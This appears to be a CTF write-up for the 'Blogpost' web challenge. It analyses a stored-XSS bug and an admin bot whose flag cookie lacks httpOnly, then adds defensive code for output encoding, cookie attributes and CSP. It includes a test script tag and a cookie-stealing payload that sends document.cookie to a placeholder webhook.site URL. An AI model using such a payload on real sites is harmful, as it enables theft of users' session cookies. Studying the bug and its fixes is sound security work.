1.
It was an interesting week. I had 3 CTFs this weekend and ended up centering on only one of them, so I didn't grind hard enough to say I did something in this CTF. The server connection was wacky for me, and I don't even have any decent screenshots to squeeze a writeup out of! So this writeup is more of a belated review. It's focused on analyzing the source code and spotting the vulnerabilities.
2. THE CHALL
- Blogpost
Blogpost - Web
Jaga created an internal social media platform for the company. Can you leak anyone's information?
After experimenting with the site, we discover a page where we can create posts, which suggests CSRF or XSS. Testing whether JavaScript can be injected into the page, the payload below runs:
<script>console.log(1234)</script>
which confirms that XSS is possible.
Don't forget we're provided with the source code.
router.post('/post', auth, async (req, res) => {
    const { title, content } = req.body;
    if (title && content) {
        // title and content are stored as-is; no encoding happens here
        db.addPost(title, req.user.username, content)
            .then(async () => {
                // every post by a non-admin user triggers viewPosts()
                if (req.user.username != 'admin') {
                    await viewPosts();
                }
                res.status(200).send(response('Success'));
            })
            .catch(() => {
                console.log('oof');
                res.status(500).send(response('Error'));
            });
    }
});
Hmm, if the user isn't admin, they "view posts." What exactly does viewPosts() do?
// in the router file
import { viewPosts } from '../bot.js';

// bot.js (puppeteer, browser_options and sign are defined earlier in the
// same file; that part is not shown here)
export const viewPosts = async () => {
    try {
        const browser = await puppeteer.launch(browser_options);
        let context = await browser.createIncognitoBrowserContext();
        let page = await context.newPage();
        // the bot authenticates as admin with a freshly signed session token
        let token = await sign({ username: 'admin' });
        await page.setCookie({
            name: "session",
            'value': token,
            domain: "127.0.0.1",
        });
        // the flag lives in a second cookie; note that neither cookie sets
        // httpOnly, so both are readable from document.cookie
        await page.setCookie({
            name: "flag",
            'value': "REDACTED",
            domain: "127.0.0.1",
        });
        // the bot then loads the blog page, where the stored posts are rendered
        await page.goto('http://127.0.0.1:1337/blog', {
            waitUntil: 'networkidle2',
            timeout: 8000
        });
        await browser.close();
    } catch(e) {
        console.log(e);
    }
};
This part of the bot.js file shows that an admin bot visits the blog page whenever we create a post. The bot carries the flag in a cookie, and since that cookie is set without httpOnly, any script that runs on the blog page can read it through document.cookie. Our job is to exploit the stored XSS and get the flag out of that cookie.
Finally, all of this boils down to simple XSS. The payload would be...
document.location.href = "<webhook.site>?c=" + document.cookie;
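For contrast, here is the defender's side of the same challenge as an added example (my own code, not the challenge's source): the two fixes that would have closed it. The post renderer HTML-encodes title, author and content before they reach the page, and the cookie helpers set the attributes that bot.js left out. The `renderPost`, `hardenedCookie`, `setCookieHeader` and `cspHeader` names and the sample post are all my own constructions; the cookie fields match what Puppeteer's `page.setCookie` accepts, so the same object shape would work in the bot.

```javascript
// Added example, not the challenge's code. Plain Node.js, no Express or
// Puppeteer needed, so it runs offline.

// 1. Output encoding. Post fields are attacker-controlled, so every
//    character with meaning in HTML is replaced before rendering.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer for the /blog page: a stored <script> tag comes
// out as inert text instead of executing in the admin bot's browser.
function renderPost(post) {
  return `<article><h2>${escapeHtml(post.title)}</h2>` +
         `<p class="author">${escapeHtml(post.author)}</p>` +
         `<div class="content">${escapeHtml(post.content)}</div></article>`;
}

// 2. Cookie attributes. bot.js sets "session" and "flag" with only
//    name/value/domain, so document.cookie exposes both. httpOnly keeps
//    them away from script; secure and sameSite narrow when they are sent.
//    Puppeteer's page.setCookie accepts these same fields.
function hardenedCookie(name, value) {
  return {
    name,
    value,
    domain: '127.0.0.1',
    httpOnly: true,
    secure: true,
    sameSite: 'Strict',
  };
}

// The equivalent Set-Cookie header a server would send for the session.
function setCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// 3. Defence in depth. A Content-Security-Policy without 'unsafe-inline'
//    means an inline <script> that slips past encoding still does not run,
//    and connect-src limits where fetch/XHR from the page may go.
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "connect-src 'self'",
    "form-action 'self'",
    "base-uri 'none'",
    "object-src 'none'",
  ].join('; ');
}

// Constructed sample: the test payload from the writeup stored as a post.
const samplePost = {
  title: 'hello',
  author: 'guest',
  content: '<script>console.log(1234)</script>',
};

const renderedSample = renderPost(samplePost);
```

With these in place the bot still visits every new post, but the stored payload renders as text, and even a successful injection would find nothing in document.cookie because the flag cookie is httpOnly.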
gg